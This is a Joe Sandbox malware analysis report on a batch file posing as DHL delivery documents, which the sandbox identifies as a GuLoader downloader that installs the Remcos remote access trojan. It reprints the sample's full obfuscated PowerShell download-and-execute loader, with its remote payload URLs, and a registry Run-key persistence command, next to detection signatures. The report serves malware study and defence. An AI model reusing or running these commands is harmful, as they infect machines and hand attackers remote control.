Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat

Overview

General Information

Sample name:awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat
Analysis ID:1632025
MD5:91c8165a5787202c8a3c587ebd54efac
SHA1:f8017746c8d4dfa157332a57bd88457460b5265d
SHA256:04685d36eaf2a1399f1435d62c1790acda711dce1df22177f36e5f693d25b62a
Tags:batDHLuser-abuse_ch
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\awb_post_dhl_delivery_documents_06_03_2025_00000000000250506.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6232 cmdline: powershell.exe -windowstyle hidden "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBleedbUnderaWim,llSubru:Vi.icdDdsdmuBulniE ForunHi hjAAm riS onre= tuden Di leCommuWPassk-Te stOSemipbStikkjBrndeE umpiCImagiTUvirk Fork STovniY crimsSulk T Hyg eNaturmb yst.Snksm$StentSS ksnTblackoAuto kGray ES ephrForndfChromyfjernrFertieGrundnSimple edro9');Yngve ($Mervrdiafgift);Yngve (Freeloaded 'Ove s$Par edBrighuInebreSalgsnSkarnaprer s Hyd..FloteHSodbueReefiaCostadLiv feGon arHenresAtox [Calix$ ajlA KontbForbrsHaileu MalarCruncdFangsiOutposPochotSaltpiS,brusArteskS hiz]Omven=Jovil$PredeUfettid BabitTjeneaVelbelQuadreKundgnHaandd mithe erins');$Ejakulationens=Freeloaded 'Drikk$Hygied eskeuRedakeEasehnSyr.naSmeltsPolst.radiuDSelv oDelegwNitron Gin l TromoAl,ueahiromd kamgF iagnikysselStoreeSamba( Anti$I.vbaG Sg ei Erotghriget ollaf LytteBalisbS iraeGainlrHoldes Bred, No o$FlerfL EncoaTen kcMiav.u Reg.nNonvae Asph)';$Lacune=$Trouserettes;Yngve (Freeloaded 'Jette$,saltg HypelAttemoLa riBStaliALan eL Ar e: TenfABrodnTPersit ephaeMonodnBekent chroALitu T,ulgaeAfspn= rust(CykelT Kyooe.dlcsSCytoctligbr- granPAfdreaUpsh,t Se.ohMetam Gros$StimularvekachalcCUgelaUMultiN UfrieAbi t)');while (!$Attentate) {Yngve (Freeloaded ' nder$Kon,ogRoseolAnreto,imenbLag.nabetn lSp rk: KgenBAalhouGawisnStttedBrandgKonstaUnitar orwanSwinksTra.tf Suc.iKyli.sGenn.k.warleWorkfrFjerde Shar=Pre e$AdenioFakserHic.enSpildiGravktAphonh IndsoTranspAf,rnhbjergi Autol Alumi acrothetore') ;Yngve $Ejakulationens;Yngve (Freeloaded 'Helmi[Mollet,eetohR nncRPoneye lympAmisunDAntefianat n Far GUnres. JabaT,iddeH Fru,RAlt neStra,a Hes DBea b]Carna: Swee:Mic,oSBaad.lSel gEP.oseEUlykkpSvmme(Undig4Skirm0 Impo0Preen0Pumme)');Yngve (Freeloaded 'Lgdom$Harw G GyptlGasteOPri cBPuss,ASkewbLBryst:MaalgaFeriaTCha eTYearde Imp,nTallot xtiaSemikt BeskE Came=Dekst(dice tPo ypECi ilSSquamTBen,t- ChipPTi.ryaA.chet Jazzh Sa t Depo$Inv nlSerboAGrnsec,nstaUL ndbnUns cENeutr)') ;Yngve (Freeloaded 'Voldg$ Bic,GSpotlLDjvleO HoveB RullaSept lCraf,:ShipkaAtriaGF,attg espeLUnseruAbstiTDiveliAvancNAdresA CirktConjuIBonitOIsotoNHaarlE Sa mRBorgaNCarboE enco=Indva$ GrntgReworLH.weloPseudbGysetAGelatlSpin :.anthBBaandRRolliAAnangNanfoedbrus.bHygieoLi elmBlideB EfteEDelilRCountNMakvresnoni+ Fuse+Aikok%Barbu$ SalahK mmeEf,rmisDist,TPoo c.UntarcAngliODroskUCroppnPassiT') ;$Gigtfebers=$hest[$Agglutinationerne]}$Skaftet106=331339;$Seddelautomaters=31340;Yngve (Freeloaded 'Hauss$O kupg LienLClav ONoncobTi.krABesejLTwadd: E hvs O viuUdstyp Chale DollROver,ISubfun SwamjOv rdu hacksLagdeTAfstaISerbec halve ork Afrik=Contr AfsvaGVi maEUautoTBucko-badenCchapeOTreaanNgleoTTyfoneFjel NKobbeTEks.r tilsm$OpstvLFlimrARaadec trmpUMan,rNUntere');Yngve (Freeloaded 'Marve$D.topgFors lSammeo.xtenbChontaKondulBest :spil OTrir,uCassatRafliw endei Udr n KonfdIn ecePalmcdHyd o grafl=Bantu Ornit[T kniS AnnayIdiocsChapktLamiieLog nmPare . ptioCRegnso ftern Datevx.logeFamilr FinitJrg o]Intra:U exp:ParasF uperrBlegaoReconm P ogB D caa Ny as isceeExcu 6varia4Beta SFoldatXy tsr Coloi Pr,tn eactgSvbe.( Clau$ onces N nruMelanpSammeePraterunhabiren.rnAllogjTilvnu Sge,s ejlbtF,rsti daggcOrdtleskakm)');Yngve (Freeloaded ' Kdfo$SubtrGSipi lLockpOSpeciB SamfANonmulDeduk:BrugeSAubreP BenbLInt aOSk meTUdfric,ivilh Brayi F brEWrathS SalaTMarsu Outwa= Poly Forem[CaseaSAnantYI dlss stamTKarave BessM Un.e.F lchtO ercENoncoxUnderTDeka . ScirEGy,diNKlasscKlassOUnvexD ynd IMercaner enGSpnds]Nonac:Ub qu:Pro yaRosensNskebcPassiISkitsiBarna. UnslgSindoENondiTBlrenSAnaloTDeparR AromIUmeddnAnpargB new(Visit$ T,ktOAag rUC.phaTN uroW dataIAfspaNForsgDLasere MetaDMarxi)');Yngve (Freeloaded ' adel$Ku snG TankLombytoBj,feBSkibsABen.nLdulge:Nedkum credi SkrilangelISpekuECher U SilkBSk,ptEAu omsArbejKMuskeY SheeTAdodfTFals EViewiLFikhsSUnevieveltiSFrkapLdomoro pvasVH ileGG nneiBle,svBloodnDialoiHansinmis uGFan,t= ohu$Sn rpSCerviP B frL adv O ShanTBygniC etaHPengeii greEudsttsNoncoT Carb. SekvSWorkaUDoubtBgermas PyoptVolter,ulgaIStockNConsug inm.(Hu ej$SantaS Ten kDisaraSl omf ,irsTCycloE ankiTkarte1Ordkl0 Grun6Fedtr, E tr$ exceSSelleeliterdSemmedHec,lEElastLKlokkANathaUBasiltNestaOKronvMKoranaF.ldeTResouEGermaRMoedesGenne)');Yngve $Milieubeskyttelseslovgivning;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Reconjoin;function Yngve($Sagan){ .($Miljforandringen) ($Sagan)} function Freeloaded($Knyttelversenes){$Unsuppleness=5;do{$Nonordered+=$Knyttelversenes[$Unsuppleness];$Unsuppleness+=6;$Gaardmand=Format-List} until(!$Knyttelversenes[$Unsuppleness])$Nonordered}$Stokerfyrene9=Freeloaded ' GadeN s ejeMangat Anhy.Retniw';$Stokerfyrene9+=Freeloaded 'Lithse nalybFa erc U milPrec.IRailrE SlgtNVid rt';$Udtalendes=Freeloaded 'CommuMSpurro,vulrz in.tiCoccilBir.mlTre eaSte,n/';$Unsupplenesschthyologic=Freeloaded 'VirtuTTermolDebats Humu1Tusin2';$Soejlevis='Green[GratiNCentreM niatHegem. Ud aSGrisgETeaterAfslav Ce lIClaywCFlybyENectaPDionyo PanaI aarenF,refTIn,erMDrgniaLuftfn FednaBeredgRapnie DoveRBreds]Helli:Smoko: portSRestre He lcP.rmuuTalefR ArriiBalbutGastrYSm.lkpPusssRSlaveOTyptoT Sy co ffabCBouiloPlejelB,jle= Soli$SkuesU Ss eNtoymas fteuGa.lopCystep Ui.eLTonsiEjejunn SystEContrSAristSO denCStyk hH ortT Ove h entyParalOTr efL Veg oBargaGHorteIS ngnc';$Udtalendes+=Freeloaded ' Ski 5Ov rk.Jensp0Eastr Inebr( Rev W.elefiPantenGipsudLemaro NeurwApotesManas Attr NZamorTgamle Te.ns1Sputn0cuiss. Ti.s0Fines;Torsk CadmiWFrakoiVul,anGaase6Kreat4,lkef; Stic Uninsx Slag6,awmo4P two;fort UnchrChefsvCivil:D,ndr1uneat3 ykke4Coshe.Fotog0.itel)Kr ig UdpoGTranseS aftcMuslikAortooRetab/Trach2 prin0Skumm1Afrik0Rhamn0Outsp1 cadm0S ill1Be gg KnittFUrtepi AvisreftereNarref K onoInditx S tr/No,su1Rdbed3 Besk4 Bist.Bukse0';$Absurdistisk=Freeloaded ' Kom,uPetu,SGearkEPulveR Kell-GendeaForkoG inusEPseudNSpherT';$Gigtfebers=Freeloaded 'E bothHavmit .wizt inegpReallsMniac:baa.m/Chi.k/Eng lpTapsae ForhnIterodFr,tieAfsp l PurdiRespivAdopteindklr PodoySk alh Nat linde . Har cMisaloD,modmVog.m/BrugeMS ttiuBidsar C mpkAlkyde Anc rOv,rc. SejllMtrikpTank k Spic> Natuh Bl.et F lctMhla,pUndersA gaa:Udvik/Deute/Skol.pMagteeSkibsn Im rd.ophieAntislD iryiPa advNonreeblaakrpatriy Rou,h revolTrskoxSubtrp Medd.Uddifc DyksoUdslum Hrme/WolflMRekinuGrororYndlikT luseSleskr nder.Hektol GrnspStridk';$Delggelsesdrifters=Freeloaded 'Overd>';$Miljforandringen=Freeloaded 'GrublIGraniE By.aX';$Adulterers='sammenbundne';$Unincriminated='\regnskabsinformationernes.arm';Yngve (Freeloaded 'Kontr$ForfagPraecLSemipO ekstbWadinaHjertlClu r:T ailtEd toRGlansOD.gteuK epesSaccaeLebisR Cavae Heget la atMor gENedrySAutop= Toug$OxygaEHistoNA sisVScore:JutehAPluriPClimapprecodPenn aHjemmtTo liA Disj+Skelg$SonorU ContNUnsi Iu iraNAutenCStnder ,eakiKloreMLateri antinUdtrkaK mmuT,uldtE V,std');Yngve (Freeloaded 'Probl$PerioGEksemlDi.agoPostnbsalamaEndo LPerfe:JujubHSuiliE lreSTa llTPerso=glded$ Sup.gPr seiObserGVisnitIndisFU,dlaePig ibAssocETidsuRBesidS .rim.InaptsTryk pRevisl DomfIheldiTSur,n(Ant.t$Slt ed BusieFunktLSymphGTriolgHybrieDolenL GoanSSc ooeruti sBrandDHolodrCom aIMultifoppostPat.neIndt,rKo ifSOrdre)');Yngve (Freeloaded $Soejlevis);$Gigtfebers=$hest[0];$Mervrdiafgift=(Freeloaded 'Who t$ uncogNedd LPincuoBleedbUnderaWim,llSubru:Vi.icdDdsdmuBulniE ForunHi hjAAm riS onre= tuden Di leCommuWPassk-Te stOSemipbStikkjBrndeE umpiCImagiTUvirk Fork STovniY crimsSulk T Hyg eNaturmb yst.Snksm$StentSS ksnTblackoAuto kGray ES ephrForndfChromyfjernrFertieGrundnSimple edro9');Yngve ($Mervrdiafgift);Yngve (Freeloaded 'Ove s$Par edBrighuInebreSalgsnSkarnaprer s Hyd..FloteHSodbueReefiaCostadLiv feGon arHenresAtox [Calix$ ajlA KontbForbrsHaileu MalarCruncdFangsiOutposPochotSaltpiS,brusArteskS hiz]Omven=Jovil$PredeUfettid BabitTjeneaVelbelQuadreKundgnHaandd mithe erins');$Ejakulationens=Freeloaded 'Drikk$Hygied eskeuRedakeEasehnSyr.naSmeltsPolst.radiuDSelv oDelegwNitron Gin l TromoAl,ueahiromd kamgF iagnikysselStoreeSamba( Anti$I.vbaG Sg ei Erotghriget ollaf LytteBalisbS iraeGainlrHoldes Bred, No o$FlerfL EncoaTen kcMiav.u Reg.nNonvae Asph)';$Lacune=$Trouserettes;Yngve (Freeloaded 'Jette$,saltg HypelAttemoLa riBStaliALan eL Ar e: TenfABrodnTPersit ephaeMonodnBekent chroALitu T,ulgaeAfspn= rust(CykelT Kyooe.dlcsSCytoctligbr- granPAfdreaUpsh,t Se.ohMetam Gros$StimularvekachalcCUgelaUMultiN UfrieAbi t)');while (!$Attentate) {Yngve (Freeloaded ' nder$Kon,ogRoseolAnreto,imenbLag.nabetn lSp rk: KgenBAalhouGawisnStttedBrandgKonstaUnitar orwanSwinksTra.tf Suc.iKyli.sGenn.k.warleWorkfrFjerde Shar=Pre e$AdenioFakserHic.enSpildiGravktAphonh IndsoTranspAf,rnhbjergi Autol Alumi acrothetore') ;Yngve $Ejakulationens;Yngve (Freeloaded 'Helmi[Mollet,eetohR nncRPoneye lympAmisunDAntefianat n Far GUnres. JabaT,iddeH Fru,RAlt neStra,a Hes DBea b]Carna: Swee:Mic,oSBaad.lSel gEP.oseEUlykkpSvmme(Undig4Skirm0 Impo0Preen0Pumme)');Yngve (Freeloaded 'Lgdom$Harw G GyptlGasteOPri cBPuss,ASkewbLBryst:MaalgaFeriaTCha eTYearde Imp,nTallot xtiaSemikt BeskE Came=Dekst(dice tPo ypECi ilSSquamTBen,t- ChipPTi.ryaA.chet Jazzh Sa t Depo$Inv nlSerboAGrnsec,nstaUL ndbnUns cENeutr)') ;Yngve (Freeloaded 'Voldg$ Bic,GSpotlLDjvleO HoveB RullaSept lCraf,:ShipkaAtriaGF,attg espeLUnseruAbstiTDiveliAvancNAdresA CirktConjuIBonitOIsotoNHaarlE Sa mRBorgaNCarboE enco=Indva$ GrntgReworLH.weloPseudbGysetAGelatlSpin :.anthBBaandRRolliAAnangNanfoedbrus.bHygieoLi elmBlideB EfteEDelilRCountNMakvresnoni+ Fuse+Aikok%Barbu$ SalahK mmeEf,rmisDist,TPoo c.UntarcAngliODroskUCroppnPassiT') ;$Gigtfebers=$hest[$Agglutinationerne]}$Skaftet106=331339;$Seddelautomaters=31340;Yngve (Freeloaded 'Hauss$O kupg LienLClav ONoncobTi.krABesejLTwadd: E hvs O viuUdstyp Chale DollROver,ISubfun SwamjOv rdu hacksLagdeTAfstaISerbec halve ork Afrik=Contr AfsvaGVi maEUautoTBucko-badenCchapeOTreaanNgleoTTyfoneFjel NKobbeTEks.r tilsm$OpstvLFlimrARaadec trmpUMan,rNUntere');Yngve (Freeloaded 'Marve$D.topgFors lSammeo.xtenbChontaKondulBest :spil OTrir,uCassatRafliw endei Udr n KonfdIn ecePalmcdHyd o grafl=Bantu Ornit[T kniS AnnayIdiocsChapktLamiieLog nmPare . ptioCRegnso ftern Datevx.logeFamilr FinitJrg o]Intra:U exp:ParasF uperrBlegaoReconm P ogB D caa Ny as isceeExcu 6varia4Beta SFoldatXy tsr Coloi Pr,tn eactgSvbe.( Clau$ onces N nruMelanpSammeePraterunhabiren.rnAllogjTilvnu Sge,s ejlbtF,rsti daggcOrdtleskakm)');Yngve (Freeloaded ' Kdfo$SubtrGSipi lLockpOSpeciB SamfANonmulDeduk:BrugeSAubreP BenbLInt aOSk meTUdfric,ivilh Brayi F brEWrathS SalaTMarsu Outwa= Poly Forem[CaseaSAnantYI dlss stamTKarave BessM Un.e.F lchtO ercENoncoxUnderTDeka . ScirEGy,diNKlasscKlassOUnvexD ynd IMercaner enGSpnds]Nonac:Ub qu:Pro yaRosensNskebcPassiISkitsiBarna. UnslgSindoENondiTBlrenSAnaloTDeparR AromIUmeddnAnpargB new(Visit$ T,ktOAag rUC.phaTN uroW dataIAfspaNForsgDLasere MetaDMarxi)');Yngve (Freeloaded ' adel$Ku snG TankLombytoBj,feBSkibsABen.nLdulge:Nedkum credi SkrilangelISpekuECher U SilkBSk,ptEAu omsArbejKMuskeY SheeTAdodfTFals EViewiLFikhsSUnevieveltiSFrkapLdomoro pvasVH ileGG nneiBle,svBloodnDialoiHansinmis uGFan,t= ohu$Sn rpSCerviP B frL adv O ShanTBygniC etaHPengeii greEudsttsNoncoT Carb. SekvSWorkaUDoubtBgermas PyoptVolter,ulgaIStockNConsug inm.(Hu ej$SantaS Ten kDisaraSl omf ,irsTCycloE ankiTkarte1Ordkl0 Grun6Fedtr, E tr$ exceSSelleeliterdSemmedHec,lEElastLKlokkANathaUBasiltNestaOKronvMKoranaF.ldeTResouEGermaRMoedesGenne)');Yngve $Milieubeskyttelseslovgivning;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3300 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 4640 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2996 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\hsGaonspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3800682702.0000000008459000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2319039316.0000000009664000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: powershell.exe PID: 6232JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 6232INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x16842b:$b2: ::FromBase64String(
          • 0x168464:$b2: ::FromBase64String(
          • 0x16849e:$b2: ::FromBase64String(
          • 0x1684d9:$b2: ::FromBase64String(
          • 0x168515:$b2: ::FromBase64String(
          • 0x168552:$b2: ::FromBase64String(
          • 0x168590:$b2: ::FromBase64String(
          • 0x1685cf:$b2: ::FromBase64String(
          • 0x16860f:$b2: ::FromBase64String(
          • 0x168650:$b2: ::FromBase64String(
          • 0x168692:$b2: ::FromBase64String(
          • 0x1686d5:$b2: ::FromBase64String(
          • 0x168719:$b2: ::FromBase64String(
          • 0x16875e:$b2: ::FromBase64String(
          • 0x1687a4:$b2: ::FromBase64String(
          • 0x1687eb:$b2: ::FromBase64String(
          • 0x168833:$b2: ::FromBase64String(
          • 0x27bdb:$s1: -join
          • 0x22eaf5:$s1: -join
          • 0x23bbca:$s1: -join
          • 0x23ef9c:$s1: -join
          Process Memory Space: powershell.exe PID: 6580JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_6232.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_6580.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc7ba:$b2: ::FromBase64String(
              • 0xb84c:$s1: -join
              • 0x4ff8:$s4: +=
              • 0x50ba:$s4: +=
              • 0x92e1:$s4: +=
              • 0xb3fe:$s4: +=
              • 0xb6e8:$s4: +=
              • 0xb82e:$s4: +=
              • 0x15c51:$s4: +=
              • 0x15cd1:$s4: +=
              • 0x15d97:$s4: +=
              • 0x15e17:$s4: +=
              • 0x15fed:$s4: +=
              • 0x16071:$s4: +=
              • 0xc061:$e4: Get-WmiObject
              • 0xc250:$e4: Get-Process
              • 0xc2a8:$e4: Start-Process
              • 0x16925:$e4: Get-Process

              System Summary

              barindex
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4640, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stalemated% -windowstyle 1 $Taknemmeligste=(gi 'HKCU:\Software\Lnoverfrslerne\').GetValue('newsmagazines');%Stalemated% ($Taknemmeligste)", ProcessId: 2996, ProcessName: reg.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.218.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3300, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49696
